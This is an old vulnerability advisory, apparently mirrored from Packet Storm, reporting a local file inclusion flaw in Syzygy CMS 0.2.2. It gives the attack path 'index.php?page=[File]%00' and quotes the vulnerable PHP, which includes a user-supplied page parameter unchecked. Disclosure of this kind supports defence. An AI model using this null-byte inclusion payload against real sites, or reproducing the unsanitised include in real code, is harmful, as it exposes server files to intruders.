Lucene search
K

syzygy-lfi.txt

🗓️ 11 Jun 2008 00:00:00Reported by StAkeRType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 21 Views

Syzygy CMS 0.2.2 Local File Inclusion Vulnerabilt

Code
`[*]================================================================================[*]  
| _____ _ _ _ _____ |  
| |_ _| |__ (_)_ __ __| | | ____| _ ___ |  
| | | | '_ \| | '__/ _` | | _|| | | |/ _ \ |  
| | | | | | | | | | (_| | | |__| |_| | __/ |   
| |_| |_| |_|_|_| \__,_| |_____\__, |\___| |  
| |___/ |  
| ____ _ _ |   
| / ___| ___ ___ _ _ _ __(_) |_ _ _ |  
| \___ \ / _ \/ __| | | | '__| | __| | | | |  
| ___) | __/ (__| |_| | | | | |_| |_| | |  
| |____/ \___|\___|\__,_|_| |_|\__|\__, | |  
| |___/ |  
[*]================================================================================[*]  
| Author: StAkeR ~ [email protected] |  
[*]================================================================================[*]  
| Third Eye Security Members => Osirys,StAkeR,Over_Flow,Miclen |  
[*]================================================================================[*]   
| Syzygy CMS 0.2.2 <= Local File Inclusion Vulnerabilty |  
[*]================================================================================[*]  
| http://surfnet.dl.sourceforge.net/sourceforge/syzygycms/syzygycms-0.2.2.tar.gz |  
[*]================================================================================[*]  
| index.php?page= [File]%00 |  
[*]================================================================================[*]  
  
<?php  
if (isset($_GET['page']))  
{  
$page=$_GET['page'];  
}else{  
$page='main.php';  
}  
if(is_file($page))  
{  
//add block to page  
include("./".$page);  
}else{  
//error reading page! go to default error file 404error.php  
include("./404error.php");  
}  
?>  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation